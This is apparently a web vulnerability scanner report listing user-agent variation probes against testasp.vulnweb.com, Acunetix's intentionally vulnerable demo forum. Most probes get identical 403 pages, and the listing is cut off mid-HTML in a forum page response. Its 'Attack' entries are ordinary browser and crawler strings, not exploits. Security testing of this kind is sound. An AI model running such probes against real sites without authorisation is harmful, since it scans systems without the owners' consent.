| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 317 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:01 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 339 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:02 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 350 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:03 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 408 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:04 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 313 bytes. |
GET http://testasp.vulnweb.com/jscripts HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:03 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 326 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:04 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) |
| Evidence | |
| Request Header - size: 326 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:03 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) |
| Evidence | |
| Request Header - size: 326 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:02 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| Evidence | |
| Request Header - size: 348 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:04 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) |
| Evidence | |
| Request Header - size: 359 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:05 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 |
| Evidence | |
| Request Header - size: 417 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:06 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | msnbot/1.1 (+http://search.msn.com/msnbot.htm) |
| Evidence | |
| Request Header - size: 322 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce HTTP/1.1
Host: testasp.vulnweb.com User-Agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 160 bytes. |
HTTP/1.1 403 Forbidden
Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:05 GMT Content-Length: 1233 |
| Response Body - size: 1,233 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | Header User-Agent |
| Attack | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) |
| Evidence | |
| Request Header - size: 379 bytes. |
GET http://testasp.vulnweb.com/Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA Content-Length: 0 |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 178 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 08:19:11 GMT Content-Length: 10038 |
| Response Body - size: 10,038 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Acunetix Web Vulnerability Scanner</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> Acunetix Web Vulnerability Scanner </div> <table width="100%" border="0" cellspacing="0" cellpadding="5"> <tr> <td class="tableheader">Thread</td> <td class="tableheader">Posts</td> <td class="tableheader">Posted by</td> <td class="tableheader">Last Post</td> </tr> <tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>42</a></div></td><td>36</td><td>Pedro Miguel</td><td>3/13/2022 2:43:15 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>42</a></div></td><td>7</td><td>Pedro Miguel</td><td>3/13/2022 3:13:51 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=5'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=6'>42</a></div></td><td>1</td><td>Pedro Miguel</td><td>3/13/2022 10:10:28 AM</td></tr><tr bgcolor='#e9ffe9'><td><div 